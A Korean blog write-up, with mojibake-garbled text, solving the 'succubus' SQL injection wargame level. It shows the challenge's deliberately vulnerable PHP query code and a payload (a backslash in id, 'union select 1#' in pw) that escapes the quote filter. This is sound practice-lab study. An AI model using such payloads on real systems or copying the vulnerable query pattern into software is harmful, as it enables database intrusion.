Security Mode

wargame ๐Ÿด‍โ˜ ๏ธ write-up/Lord of SQLInjection

succubus

Kortsec1 2023. 8. 1. 23:37

1. Code

<?php
  include "./config.php"; 
  login_chk();
  $db = dbconnect();
  if(preg_match('/prob|_|\.|\(\)/i', $_GET[id])) exit("No Hack ~_~"); 
  if(preg_match('/prob|_|\.|\(\)/i', $_GET[pw])) exit("No Hack ~_~");
  if(preg_match('/\'/',$_GET[id])) exit("HeHe");
  if(preg_match('/\'/',$_GET[pw])) exit("HeHe");
  $query = "select id from prob_succubus where id='{$_GET[id]}' and pw='{$_GET[pw]}'"; 
  echo "<hr>query : <strong>{$query}</strong><hr><br>"; 
  $result = @mysqli_fetch_array(mysqli_query($db,$query)); 
  if($result['id']) solve("succubus"); 
  highlight_file(__FILE__); 
?>

 

2. Condition

  • ์ž‘์€ ๋”ฐ์˜ดํ‘œ๋ฅผ ํ•„ํ„ฐ๋งํ•œ๋‹ค.

 

3. Solution

Single Quote๋ฅผ ์ž…๋ ฅํ•˜์—ฌ ์ •ํ•ด์ง„ ์ฟผ๋ฆฌ์—์„œ ๋ฒ—์–ด๋‚˜์•ผ ํ•œ๋‹ค.

ํ•˜์ง€๋งŒ, '๋Š” ํ•„ํ„ฐ๋ง ๋˜์—ˆ๊ธฐ ๋•Œ๋ฌธ์— ๋‹ค๋ฅธ ๋ฐฉ๋ฒ•์„ ์ฐพ์•„๋ณด์•˜๋‹ค.

 

๋ฐ”๋กœ ์ฟผ๋ฆฌ์† Single Quote๋ฅผ Escaping ์‹œํ‚ค๋Š” ๊ฒƒ์ด๋‹ค.

๊ตฌ์ฒด์ ์ธ ์„ค๋ช…์€ ๋‹ค์Œ๊ณผ ๊ฐ™๋‹ค.

 

 

"select id from prob_succubus where id='{$_GET[id]}' and pw='{$_GET[pw]}'"

์œ„ ์ฟผ๋ฆฌ์—์„œ id, pw์— ์•„๋ž˜ ๊ฐ’์„ ๋ณด๋‚ธ๋‹ค๊ณ  ํ•ด๋ณด์ž.

๋ณ€์ˆ˜๋ช… ๊ฐ’
id \
pw  union select 1#

 

"select id from prob_succubus where id='\' and pw=' union select 1#'"

์›๋ž˜ ์žˆ๋˜ Single Quote๊ฐ€ ๋ฌธ์ž์ฒ˜๋ฆฌ ๋˜๋ฉด์„œ, pw๊ฐ’์ด sql๊ตฌ๋ฌธ์œผ๋กœ ๋“ค์–ด๊ฐ„๋‹ค.

 

์Œ.. ์ด๊ฒŒ ๋์ด๋‹ค.

 

4. Injection

๋”๋ณด๊ธฐ

 

์•„๋ž˜ ๊ฐ’์„ ๋ณด๋‚ด์ฃผ๋ฉด ๋ฌธ์ œ๊ฐ€ ํ•ด๊ฒฐ๋œ๋‹ค.

 

๋ณ€์ˆ˜๋ช… ๊ฐ’
id \
pw  union select 1#

 

img_1 succubus clear

 

 

'wargame ๐Ÿดโ€โ˜ ๏ธ write-up > Lord of SQLInjection' ์นดํ…Œ๊ณ ๋ฆฌ์˜ ๋‹ค๋ฅธ ๊ธ€

nightmare  (0) 2023.08.03
zombie_assasin  (0) 2023.08.03
assasin  (0) 2023.08.01
giant  (0) 2023.08.01

'wargame ๐Ÿด‍โ˜ ๏ธ write-up/Lord of SQLInjection'์˜ ๋‹ค๋ฅธ๊ธ€

  • ํ˜„์žฌ๊ธ€succubus

๊ด€๋ จ๊ธ€

ํ‹ฐ์Šคํ† ๋ฆฌํˆด๋ฐ”